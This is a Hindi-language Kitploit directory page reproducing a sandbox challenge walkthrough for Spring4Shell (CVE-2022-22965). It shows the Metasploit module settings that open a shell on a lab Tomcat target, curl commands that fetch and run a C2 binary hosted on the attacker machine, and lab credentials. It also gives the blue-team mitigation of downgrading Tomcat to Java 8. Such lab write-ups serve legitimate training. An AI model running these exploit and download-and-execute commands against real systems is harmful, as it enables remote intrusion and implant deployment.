Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
Sandbox-Challenge-Spring4Shell-CVE-2022-22965- — # CVE-2022-22965 (Spring4Shell) का Metasploit के साथ शोषण करने की चरण-दर-चरण प्रक्रिया, C2 लिसनर तैनात करना, और Tomcat सर्वर पर Java 8 में डाउनग्रेड करके भेद्यता को कम करना। | Kitploit
उपकरण/GitHubGitHub/felisha-elmer/sandbox-challenge-spring4shell-cve-2022-22965-
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणCTFपेनिट्रेशन टेस्टिंगकमांड एंड कंट्रोललर्निंग और शिक्षारेड टीमिंगलैब और अभ्यास
GitHubfelisha-elmer/sandbox-challenge-spring4shell-cve-2022-22965-

Sandbox-Challenge-Spring4Shell-CVE-2022-22965-

# CVE-2022-22965 (Spring4Shell) का Metasploit के साथ शोषण करने की चरण-दर-चरण प्रक्रिया, C2 लिसनर तैनात करना, और Tomcat सर्वर पर Java 8 में डाउनग्रेड करके भेद्यता को कम करना।

रिपॉजिटरी देखें
143 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

Spring4Shell थ्रेट सैंडबॉक्स (CVE-2022-22965)

अवलोकन

यह वॉकथ्रू CVE-2022-22965 पर केंद्रित सैंडबॉक्स चैलेंज की पूर्ति का दस्तावेजीकरण करता है, जिसे सामान्यतः Spring4Shell के रूप में जाना जाता है — यह Spring Java फ्रेमवर्क के विशिष्ट संस्करणों को प्रभावित करने वाली एक गंभीर (CVSS 9.8/10) रिमोट कोड एक्ज़ीक्यूशन भेद्यता है। यह चैलेंज भेद्यता के आक्रामक (रेड टीम) और रक्षात्मक (ब्लू टीम) दोनों दृष्टिकोणों को कवर करता है।

नोट: इस वॉकथ्रू में दिए गए कमांड और फ़ाइल पथ इस प्रयास के दौरान उपयोग किए गए विशिष्ट वातावरण को दर्शाते हैं। आपका वातावरण भिन्न हो सकता है — पथ, IP पते और फ़ाइल नाम तदनुसार बदलें।


वातावरण

मशीनIP पताभूमिका
Security-Desk (Kali Linux)172.16.200.12हमला और कार्य मशीन
Red Target (Linux)172.16.100.90शोषण लक्ष्य
Blue Target (Linux)172.16.100.100सख्तीकरण लक्ष्य

क्रेडेंशियल्स: playerone / password123


रेड टीम उद्देश्य: Red Target पर C2 लिसनर तैनात करें

चरण 1 — लक्ष्य की पहचान करें

चैलेंज पैनल में नेटवर्क मैप टैब की समीक्षा करके Red Target का IP (172.16.100.90) सत्यापित किया। पोर्ट 80 पर चल रहे वेब एप्लिकेशन का निरीक्षण करने के लिए curl का उपयोग किया:

root@kitploit:~
curl http://172.16.100.90

आउटपुट ने /dasmsp पर रीडायरेक्ट के साथ Apache Tomcat 9.0.59 दिखाया। /dasmsp/contact पर POST फ़ॉर्म एंडपॉइंट की पहचान करने के लिए पृष्ठ स्रोत ब्राउज़ किया।

चरण 2 — Metasploit लॉन्च करें और एक्सप्लॉइट कॉन्फ़िगर करें

root@kitploit:~
msfconsole
root@kitploit:~
use exploit/multi/http/spring_framework_rce_spring4shell
set RHOSTS 172.16.100.90
set LHOST 172.16.200.12
set RPORT 80
set TARGETURI /dasmsp/contact
set PAYLOAD_PATH webapps/ROOT
set HTTP_METHOD POST
set ForceExploit true
run

एक्सप्लॉइट ने सफलतापूर्वक एक JSP शेल जनरेट किया, क्लास लोडर को संशोधित किया, लॉग फ़ाइल को फ्लश किया, और Red Target पर एक कमांड शेल सत्र खोल दिया।

चरण 3 — इंटरैक्टिव शेल प्राप्त करें

सत्र खुलने के बाद, इंटरैक्टिव शेल में अपग्रेड करने के लिए shell दर्ज किया। Metasploit ने लक्ष्य पर /usr/bin/script ढूंढा और tomcat उपयोगकर्ता के रूप में इंटरैक्टिव शेल खोलने के लिए इसका उपयोग किया।

चरण 4 — deploy_c2 स्थानांतरित करें और निष्पादित करें

deploy_c2 बाइनरी Red Target पर नहीं, बल्कि Security-Desk पर स्थित थी। इसे Security-Desk पर Python3 HTTP सर्वर के माध्यम से होस्ट किया गया:

root@kitploit:~
cd /home/playerone/Desktop/Resources/
python3 -m http.server 8080

इसे Red Target शेल सत्र के भीतर से डाउनलोड करके निष्पादित किया गया:

root@kitploit:~
curl http://172.16.200.12:8080/deploy_c2 -o /tmp/deploy_c2
chmod +x /tmp/deploy_c2
/tmp/deploy_c2

आउटपुट ने पुष्टि की: Done! — C2 लिसनर Red Target पर सफलतापूर्वक तैनात हो गया।


Blue Team उद्देश्य: Blue Target पर CVE-2022-22965 को शमित करें (Java 8 में डाउनग्रेड)

चरण 1 — Blue Target में SSH करें

Security-Desk टर्मिनल से:

root@kitploit:~
ssh [email protected]

पासवर्ड: password123

चरण 2 — Java 8 पैकेज Blue Target पर स्थानांतरित करें

Java 8 .deb पैकेज Security-Desk पर /home/playerone/Desktop/Resources/ में स्थित थे। इन्हें Security-Desk टर्मिनल से SCP का उपयोग करके Blue Target पर स्थानांतरित किया गया:

root@kitploit:~
scp /home/playerone/Desktop/Resources/*.deb [email protected]:/tmp/

स्थानांतरित किए गए पैकेज:

  • adoptium-ca-certificates_1.0.2-1_all.deb
  • fonts-dejavu_2.37-6_all.deb
  • p11-kit-modules_0.24.1-2_amd64.deb
  • p11-kit_0.24.1-2_amd64.deb
  • temurin-8-jdk_8.0.402.0.0+6_amd64.deb

चरण 3 — Java 8 पैकेज इंस्टॉल करें

Blue Target SSH सत्र पर:

root@kitploit:~
sudo dpkg -i /tmp/*.deb

चरण 4 — Java 8 को डिफ़ॉल्ट के रूप में सेट करें (ज्ञात समस्या का वर्कअराउंड)

चैलेंज की एक ज्ञात समस्या के कारण, Java 8 को मैन्युअल रूप से डिफ़ॉल्ट के रूप में सेट किए बिना जाँच सही ढंग से पंजीकृत नहीं होती है:

root@kitploit:~
sudo update-alternatives --config java

विकल्प 2 — /usr/lib/jvm/temurin-8-jdk-amd64/bin/java चुना गया।

चरण 5 — Java 8 का उपयोग करने के लिए Tomcat सेवा अपडेट करें

Tomcat सेवा यूनिट फ़ाइल का निरीक्षण किया:

root@kitploit:~
cat /etc/systemd/system/tomcat.service

JAVA_HOME पर्यावरण चर को अपडेट करने के लिए फ़ाइल संपादित की:

root@kitploit:~
sudo nano /etc/systemd/system/tomcat.service

पुराना मान:

root@kitploit:~
Environment="JAVA_HOME=/usr"

नया मान:

root@kitploit:~
Environment="JAVA_HOME=/usr/lib/jvm/temurin-8-jdk-amd64"

चरण 6 — Tomcat को रीलोड और पुनरारंभ करें

root@kitploit:~
sudo systemctl daemon-reload
sudo systemctl restart tomcat

चैलेंज पैनल में 'CVE-2022-22965 Mitigated on Blue Target' जाँच हरी हो गई।


उपयोग किए गए टूल

  • Metasploit Framework (spring_framework_rce_spring4shell मॉड्यूल)
  • curl
  • Python3 HTTP Server
  • SSH / SCP
  • dpkg
  • systemctl
  • update-alternatives
  • nano
टूल डाउनलोड करें